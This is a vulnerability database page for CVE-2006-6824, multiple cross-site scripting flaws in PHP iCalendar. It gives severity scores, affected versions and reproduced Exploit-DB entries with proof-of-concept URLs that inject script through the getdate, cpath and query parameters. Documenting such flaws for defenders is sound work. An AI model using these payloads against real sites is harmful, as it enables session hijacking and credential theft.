CVE-2006-6824
published 2006-12-29CVE-2006-6824: Multiple cross-site scripting (XSS) vulnerabilities in Jim Hu and Chad Little PHP iCalendar 2.23 rc1 and earlier allow remote attackers to inject arbitrary web…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.44%
82.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Jim Hu and Chad Little PHP iCalendar 2.23 rc1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) getdate parameter in (a) day.php, (b) month.php, (c) year.php, (d) week.php, (e) search.php, (f) rss/index.php, (g) print.php, and (h) preferences.php; the (2) cpath parameter in (i) day.php, (j) month.php, (k) year.php, (l) week.php, and (m) search.php; the (3) query parameter in search.php; and possibly the cpath, (4) unset, and (5) set parameters in a setcookie action in preferences.php; different vectors than CVE-2006-3319. NOTE: it was later reported that vectors b, c, and d also affect 2.24.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_icalendar | php_icalendar | <= 2.23_rc1 | — |
| php_icalendar | php_icalendar | — | — |
| php_icalendar | php_icalendar | — | — |
| php_icalendar | php_icalendar | — | — |
| php_icalendar | php_icalendar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work &getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/week.php?cal=all_calendars_combined971 &getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork &getdate=19700102&query=ss">alert()&submit.x=11&submit.y=15
http://www.example.com/phpicalendar/search.php?cpath=">alert()&cal=Home %2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12
http://www.example.com/phpi
Exploit-DB
PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/day.php?cal=all_calendars_combined971 &getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/year.php?cal=all_calendars_combined971 &getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/print.php?cal=Home,US+Holidays,Work &getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
Exploit-DB
PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/month.php?cal=all_calendars_combined971 &getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting
exploitdb·2006-12-27
CVE-2006-6824 PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting
PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21792/info
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work &getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E PHP icalendar XSS in preferences.php PoC PHP icalendar Lostmon Modify the target host , by default http://localhost/ cookie_language: cookie_calendar: cpath: alert(String.fromCharCod
No writeups or analysis indexed.
http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.htmlhttp://secunia.com/advisories/23499http://securitytracker.com/id?1017449http://www.osvdb.org/32493http://www.osvdb.org/32494http://www.osvdb.org/32495http://www.osvdb.org/32496http://www.osvdb.org/32497http://www.osvdb.org/32498http://www.osvdb.org/32499http://www.osvdb.org/32500http://www.securityfocus.com/archive/1/485397/100/200/threadedhttp://www.securityfocus.com/bid/21792https://exchange.xforce.ibmcloud.com/vulnerabilities/31146http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.htmlhttp://secunia.com/advisories/23499http://securitytracker.com/id?1017449http://www.osvdb.org/32493http://www.osvdb.org/32494http://www.osvdb.org/32495http://www.osvdb.org/32496http://www.osvdb.org/32497http://www.osvdb.org/32498http://www.osvdb.org/32499http://www.osvdb.org/32500http://www.securityfocus.com/archive/1/485397/100/200/threadedhttp://www.securityfocus.com/bid/21792https://exchange.xforce.ibmcloud.com/vulnerabilities/31146
2006-12-29
Published